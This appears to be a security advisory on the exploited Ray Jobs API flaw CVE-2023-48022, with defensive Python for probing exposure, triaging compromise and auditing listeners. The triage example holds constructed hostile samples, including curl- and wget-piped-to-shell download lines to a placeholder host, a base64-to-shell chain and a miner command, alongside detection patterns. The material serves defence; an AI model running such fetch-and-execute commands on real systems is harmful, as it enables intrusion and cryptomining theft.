The Ray AI framework vulnerability tracked as CVE-2023-48022 is under active exploitation in a long-running campaign that targets internet-exposed clusters for remote code execution and cryptocurrency mining. Researchers report persistent abuse of the Ray dashboard port and the Jobs API it serves, with activity stretching across roughly two years.
Many Ray deployments still sit open on the public internet. Because the Jobs API accepts a shell command as a job entrypoint from anyone who can reach it, exposure alone is enough for unauthorized code execution and follow-on compromise.
Security teams should immediately assess exposure, restrict network access, and put authentication in front of every Ray management endpoint. The campaign shows how fast adversaries pivot to AI infrastructure when management endpoints are reachable.
Maintainers have issued guidance for secure Ray deployments and treat network isolation, not a code change, as the control, yet risk remains elevated due to weak isolation, missing TLS, and unchecked internet access to dashboards.
Ray AI framework vulnerability: What You Need to Know
- Attackers abuse exposed Ray dashboards for remote code execution. No patch closes this on its own: the Ray maintainers dispute the CVE and document Ray as intended for trusted networks only, so take the dashboard off the internet and harden clusters now.
Ray AI framework vulnerability
SecurityWeek reports continued targeting of internet-exposed Ray clusters through the dashboard port (8265 by default) and the APIs it serves.
The activity aligns with CVE-2023-48022, which describes the Ray Jobs API accepting job submissions without authentication. A job's entrypoint is a shell command that the head node runs, so anyone who can reach the port can execute commands on reachable nodes.
This Ray AI framework vulnerability remains widespread because many clusters lack network isolation, authentication, and transport security.
The Ray project advises running clusters on trusted networks with proper access controls, yet exposed endpoints keep risk high.
For engineering and MLOps teams, the Ray AI framework vulnerability underscores that AI infrastructure needs the same segmentation, least privilege, and monitoring as any production service.
CVE-2023-48022 Ray dashboard exploit: how it works
The CVE-2023-48022 Ray dashboard exploit hinges on unauthenticated endpoints on the dashboard port, above all the Jobs API under /api/jobs/, which accept job submissions whose entrypoint is an arbitrary shell command run by the cluster.
When the dashboard is internet reachable, attackers can achieve Ray AI framework remote code execution without credentials, deploy scripts, and pivot laterally across the environment. Note that the maintainers dispute the CVE because Ray is documented for trusted networks only, and NVD records it as disputed; there is no version that removes the exposure by itself.
Recommended actions include restricting network access to the dashboard port, fronting it with an authenticating proxy, enabling TLS for Ray's internal traffic (TLS protects data in transit but adds no authentication to the dashboard), and following the project's secure deployment guidance.
References: the NVD entry for CVE-2023-48022 and the Ray Security Policy.
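The first question an operator has to answer is whether a given head node answers the dashboard API without credentials. The script below is an added example written for this article, not code from the Ray project. It assumes the dashboard listens on its default port 8265 and answers GET /api/version (the endpoint the Ray Jobs SDK uses for its connectivity check) with a JSON document containing a "ray_version" key; a host that answers that request without credentials is classified as exposed, because the same listener accepts job submissions. The classifier is separated from the network call so the decision logic can be tested offline.

```python
"""Probe hosts for an unauthenticated Ray dashboard / Jobs API.

Added example for this article, not Ray project code. Assumes the default
dashboard port 8265 and the /api/version endpoint used by the Ray Jobs SDK.
"""
import json
import socket
import sys
import urllib.error
import urllib.request

DEFAULT_DASHBOARD_PORT = 8265  # Ray's default; adjust if your cluster changed it


def classify_dashboard_response(status, body):
    """Map an HTTP status and response body to an exposure verdict.

    Returns one of:
      "exposed" - 200 with a Ray version document, no credentials needed
      "guarded" - 401/403/407, something in front demands authentication
      "not-ray" - reachable but not an unauthenticated Ray dashboard
    """
    if status in (401, 403, 407):
        return "guarded"
    if status == 200:
        try:
            doc = json.loads(body)
        except (ValueError, TypeError):
            return "not-ray"
        if isinstance(doc, dict) and "ray_version" in doc:
            return "exposed"
    return "not-ray"


def probe_dashboard(host, port=DEFAULT_DASHBOARD_PORT, timeout=3.0):
    """Send one unauthenticated GET to /api/version and classify the answer.

    Returns (verdict, detail). Any network error maps to "unreachable".
    """
    url = f"http://{host}:{port}/api/version"
    req = urllib.request.Request(url, headers={"User-Agent": "ray-exposure-check"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            body = resp.read().decode("utf-8", "replace")
            return classify_dashboard_response(resp.status, body), body[:200]
    except urllib.error.HTTPError as e:
        # A proxy in front of the dashboard typically answers 401/403 here.
        return classify_dashboard_response(e.code, ""), f"HTTP {e.code}"
    except (urllib.error.URLError, socket.timeout, OSError) as e:
        return "unreachable", str(e)


if __name__ == "__main__":
    # Usage: python ray_probe.py 10.0.0.5 203.0.113.9:8265 ...
    targets = sys.argv[1:] or ["127.0.0.1"]
    for target in targets:
        host, _, port = target.partition(":")
        verdict, detail = probe_dashboard(host, int(port) if port else DEFAULT_DASHBOARD_PORT)
        print(f"{target:30} {verdict:12} {detail}")
```

Run it against your own head nodes from outside the cluster's trusted network: any "exposed" verdict means an unauthenticated caller could also submit a job. Only probe hosts you are authorized to test.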
Who is at risk from this Ray AI framework vulnerability
Organizations using Ray for distributed training, model serving, or data processing face elevated risk if clusters are internet reachable. Commonly affected environments include:
- Cloud-hosted Ray clusters with public IPs or permissive security groups
- On-premises clusters running default settings without network segmentation
- Dev and test environments left open for convenience and never hardened
The Ray AI framework vulnerability intersects with broader AI security concerns, including supply chain exposure and service misconfiguration.
For related context, see coverage of threat actors exploiting cloud AI services and recent framework level flaws that impact AI workloads.
What attackers do after access
Once inside, adversaries typically leverage the Ray AI framework vulnerability to run scripts that achieve the following results:
- Fetch and launch cryptocurrency miners along with persistence mechanisms
- Enumerate environment variables, credentials, and attached storage
- Scan for additional reachable services to support lateral movement
- Disable or evade monitoring and consume CPU or GPU cycles for profit
These tactics mirror other threats to AI-adjacent systems and raise the risk of data exposure, model theft, and resource hijacking.
Research into prompt injection in AI systems shows how quickly attack surfaces evolve around ML stacks.
Detection and response guidance
To identify an active compromise linked to the Ray AI framework vulnerability, review the following signals:
- Job records from the dashboard's GET /api/jobs/ endpoint for entrypoints you did not submit (Ray records no submitter identity, so the entrypoint content is the primary signal), plus proxy or load balancer access logs for unfamiliar source IPs
- Process lists and cron or systemd entries for unexpected miners and scripts
- Outbound connections to mining pools or other suspicious hosts
- Cloud metrics for abnormal CPU or GPU consumption and egress spikes
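The signals above are cheap to check mechanically. The triage helpers below are an added example written for this article, not Ray project code. They take constructed samples in the shapes an operator would actually collect: job records in the form the dashboard's GET /api/jobs/ endpoint returns (the "entrypoint" field is what an attacker controls), crontab lines, `ps -eo pid,user,args` lines, and `ss -tnp` output for established connections. The indicator patterns and the list of stratum pool ports are heuristics for the post-exploitation behaviour described above, not a complete signature set, and the IP addresses and job IDs are invented.

```python
"""Triage helpers for a suspected Ray cluster compromise.

Added example for this article, not Ray project code. All inputs below are
constructed samples; indicator patterns are heuristics, not a full signature set.
"""
import re

# Entrypoint / crontab fragments typical of download-and-execute chains and miners.
SUSPICIOUS_COMMAND = re.compile(
    r"(curl|wget)\b.*\|\s*(ba)?sh|base64\s+-d|xmrig|minerd|stratum\+tcp|/dev/tcp/|chmod\s+\+x\s+/tmp/",
    re.IGNORECASE,
)
# Process names and flags seen with commodity miners (heuristic).
SUSPICIOUS_PROCESS = re.compile(r"xmrig|kdevtmpfsi|kinsing|--donate-level|-o\s+stratum", re.IGNORECASE)
# Ports commonly used by stratum mining pools (heuristic, not exhaustive).
MINING_PORTS = {3333, 4444, 5555, 7777, 8888, 14444, 14433, 45700}

SAMPLE_JOBS = [  # constructed, in the shape of GET /api/jobs/ entries
    {"submission_id": "raysubmit_train01", "entrypoint": "python train.py --epochs 10", "status": "SUCCEEDED"},
    {"submission_id": "raysubmit_x9f2", "entrypoint": "curl -s http://203.0.113.9/a.sh | bash", "status": "RUNNING"},
    {"submission_id": "raysubmit_b771", "entrypoint": "echo aGVsbG8= | base64 -d | sh", "status": "SUCCEEDED"},
]
SAMPLE_CRONTAB = [  # constructed
    "0 3 * * * /usr/local/bin/backup.sh",
    "*/10 * * * * wget -q -O- http://203.0.113.9/a.sh | sh",
]
SAMPLE_PS = [  # constructed `ps -eo pid,user,args` lines
    "1234 ray      /usr/bin/python -m ray.dashboard.dashboard --host=0.0.0.0",
    "4321 ray      /tmp/.x/xmrig -o stratum+tcp://203.0.113.9:3333 --donate-level 1",
    "5555 root     /usr/sbin/cron -f",
]
SAMPLE_SS = [  # constructed `ss -tnp` output
    "State Recv-Q Send-Q Local Address:Port Peer Address:Port Process",
    'ESTAB 0 0 10.0.0.5:51234 203.0.113.9:3333 users:(("xmrig",pid=4321,fd=7))',
    'ESTAB 0 0 10.0.0.5:51300 10.0.0.7:6379 users:(("raylet",pid=1200,fd=9))',
]


def triage_jobs(jobs):
    """Return submission_ids whose entrypoint looks like a drop-and-run chain."""
    return [j["submission_id"] for j in jobs if SUSPICIOUS_COMMAND.search(j.get("entrypoint", ""))]


def triage_persistence(crontab_lines):
    """Return crontab lines that re-fetch and execute remote content."""
    return [line for line in crontab_lines if SUSPICIOUS_COMMAND.search(line)]


def triage_processes(ps_lines):
    """Return (pid, args) for processes matching miner indicators."""
    hits = []
    for line in ps_lines:
        parts = line.split(None, 2)  # pid, user, rest of the command line
        if len(parts) < 3:
            continue
        pid, _user, args = parts
        if SUSPICIOUS_PROCESS.search(args):
            hits.append((int(pid), args))
    return hits


def triage_connections(ss_lines):
    """Return remote endpoints of established connections on mining-pool ports."""
    flagged = []
    for line in ss_lines:
        fields = line.split()
        if len(fields) < 5 or fields[0] != "ESTAB":
            continue
        peer = fields[4]
        _host, _, port = peer.rpartition(":")
        if port.isdigit() and int(port) in MINING_PORTS:
            flagged.append(peer)
    return flagged


def triage_all(jobs=SAMPLE_JOBS, crontab=SAMPLE_CRONTAB, ps_lines=SAMPLE_PS, ss_lines=SAMPLE_SS):
    """Run every check and return the findings keyed by evidence source."""
    return {
        "jobs": triage_jobs(jobs),
        "persistence": triage_persistence(crontab),
        "processes": triage_processes(ps_lines),
        "connections": triage_connections(ss_lines),
    }


if __name__ == "__main__":
    for source, findings in triage_all().items():
        print(f"{source:12} {findings}")
```

Treat any hit as a reason to snapshot the node before remediation: the entrypoint string, the cron line and the miner's command line together usually identify the download host and the persistence method, which you need for the rebuild.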
If indicators are present, isolate the cluster, rotate every credential the nodes could read, rebuild nodes from trusted images rather than cleaning them, and re-provision with hardened settings.
Mitigation steps for the Ray AI framework vulnerability
Defenders can reduce risk with layered controls that close the initial entry points and limit blast radius:
- Restrict dashboard and API access to trusted networks using firewalls, VPC rules, and private endpoints
- Enable TLS for Ray's internal traffic and run a current Ray release, but treat neither as a fix: the maintainers dispute the CVE, so no version removes the exposure by itself
- Place clusters behind identity aware proxies and require authentication for administrative operations
- Continuously scan for exposed services and misconfigurations across cloud and data centers
Treat the Ray AI framework vulnerability as a high impact exposure that demands minimized attack surface, strong authentication, and continuous monitoring.
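The single most common root cause is a head node started with the dashboard bound to every interface. The audit below is an added example written for this article, not Ray project code. It checks a `ray start` command line for the weak `--dashboard-host=0.0.0.0` setting (the option's default is localhost, so the wildcard is normally an explicit choice), parses constructed `ss -ltn` output to see where the dashboard and GCS ports are actually listening, and prints the corrected launch line. The `--dashboard-host` and `--dashboard-port` flags are real Ray CLI options; the sample socket table, the trusted CIDR and the port defaults (8265 dashboard, 6379 GCS) are assumptions for the example, so adjust them to your cluster.

```python
"""Audit where a Ray head node exposes its management ports.

Added example for this article, not Ray project code. The socket table below
is a constructed `ss -ltn` sample; the trusted CIDR is an assumption.
"""
import ipaddress
import shlex

RAY_PORTS = {8265: "dashboard / Jobs API", 6379: "GCS"}  # Ray defaults; change if you did
WILDCARDS = {"0.0.0.0", "*", "::", "[::]"}

SAMPLE_SS = [  # constructed `ss -ltn` output for a misconfigured head node
    "State  Recv-Q Send-Q Local Address:Port Peer Address:Port",
    "LISTEN 0      128    0.0.0.0:8265        0.0.0.0:*",
    "LISTEN 0      128    10.0.0.5:6379       0.0.0.0:*",
    "LISTEN 0      128    127.0.0.1:8266      0.0.0.0:*",
    "LISTEN 0      128    [::]:22             [::]:*",
]


def dashboard_host_from_cmdline(cmdline):
    """Extract --dashboard-host from a `ray start` line; None means the default (localhost)."""
    args = shlex.split(cmdline)
    for i, arg in enumerate(args):
        if arg.startswith("--dashboard-host="):
            return arg.split("=", 1)[1]
        if arg == "--dashboard-host" and i + 1 < len(args):
            return args[i + 1]
    return None


def parse_listeners(ss_lines):
    """Return (address, port) for LISTEN sockets in `ss -ltn` output."""
    out = []
    for line in ss_lines:
        fields = line.split()
        if len(fields) < 4 or fields[0] != "LISTEN":
            continue
        addr, _, port = fields[3].rpartition(":")
        if port.isdigit():
            out.append((addr, int(port)))
    return out


def audit_listeners(ss_lines, trusted_cidrs=("10.0.0.0/8",)):
    """Flag Ray ports bound to a wildcard or to an address outside loopback/trusted ranges.

    The GCS port must be reachable by worker nodes, so a private cluster
    address is acceptable there; the dashboard should stay on loopback and be
    reached through an authenticating proxy or SSH tunnel.
    """
    nets = [ipaddress.ip_network(c) for c in trusted_cidrs]
    findings = []
    for addr, port in parse_listeners(ss_lines):
        if port not in RAY_PORTS:
            continue
        if addr in WILDCARDS:
            findings.append((port, addr, "bound to all interfaces"))
            continue
        try:
            ip = ipaddress.ip_address(addr.strip("[]"))
        except ValueError:
            continue
        if ip.is_loopback or any(ip in n for n in nets):
            continue
        findings.append((port, addr, "bound outside trusted ranges"))
    return findings


def hardened_start_command(dashboard_host="127.0.0.1", dashboard_port=8265):
    """Head-node launch line that keeps the dashboard off non-loopback interfaces."""
    return f"ray start --head --dashboard-host={dashboard_host} --dashboard-port={dashboard_port}"


if __name__ == "__main__":
    weak = "ray start --head --dashboard-host=0.0.0.0 --port=6379"
    print("dashboard host in weak command:", dashboard_host_from_cmdline(weak))
    for port, addr, why in audit_listeners(SAMPLE_SS):
        print(f"port {port} ({RAY_PORTS[port]}) on {addr}: {why}")
    print("corrected:", hardened_start_command())
```

Binding the dashboard to loopback is necessary but not sufficient: anything that still needs the UI or the Jobs API must then come through a proxy that authenticates, and the GCS port needs the same network allow-listing the worker nodes already require.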
Implications for AI and MLOps Teams
Addressing the Ray AI framework vulnerability now strengthens the ML platform, reduces compute theft from illicit mining, and demonstrates operational due diligence.
Gains include improved configuration hygiene, safer secrets handling, and faster patch cadence, which benefit related services and data pipelines.
Teams may face short term friction as they rework network access, add authentication gateways, and retrain staff. Limited downtime can occur when moving clusters to private networks and rebuilding hosts to remove persistence.
These investments reduce long term incident risk and resource costs.
Conclusion
The campaign abusing the Ray AI framework vulnerability shows how quickly AI infrastructure becomes a high-value target once dashboards are exposed. Two years of activity signal that risk reduction is urgent.
Prioritize isolation of Ray dashboards, require authentication for administrative actions, and keep clusters updated. Pair configuration hardening with continuous monitoring and practiced incident response.
Engage security and MLOps teams together. Treat AI services like any internet facing application, and use the Ray AI framework vulnerability as a catalyst for durable improvements.
Questions Worth Answering
What is being exploited in Ray?
Attackers target the Ray dashboard port and the Jobs API it serves to submit jobs whose entrypoints are shell commands, which gives them code execution on the cluster without any credentials.
What is CVE-2023-48022?
CVE-2023-48022 describes the Ray Jobs API accepting job submissions, and therefore arbitrary commands, from anyone who can reach the dashboard port. The maintainers dispute it on the grounds that Ray is documented for trusted networks only, so NVD lists it as disputed and there is no patch: network isolation and an authenticating front end are the controls.
How long has the campaign been active?
Researchers report about two years of continued exploitation focused on exposed Ray endpoints across cloud and on premises environments.
What should I do immediately?
Remove public exposure, enforce network controls, put an authenticating proxy in front of the dashboard (Ray itself has historically shipped with none), keep Ray current, and inspect job records, processes and outbound connections for compromise indicators.
What are common post exploitation actions?
Cryptocurrency mining, persistence via scheduled tasks, discovery of credentials and storage, and lateral movement to adjacent services.
Where can I learn more about securing AI systems?
Review the Ray Security Policy and industry research on prompt injection and model service hardening.
Is there a named exploit for this issue?
Yes. Oligo Security named the campaign ShadowRay, and the CVE-2023-48022 Ray dashboard exploit enables Ray AI framework remote code execution whenever the dashboard port is reachable without network or authentication controls in front of it.
About Ray Project
Ray is an open source framework for distributed computing that scales Python workloads and AI training across clusters.
It provides tools for parallel processing, orchestration, and autoscaling to use CPUs and GPUs efficiently for ML pipelines.
Anyscale stewards the project with a broad community focused on performance, reliability, and secure operations.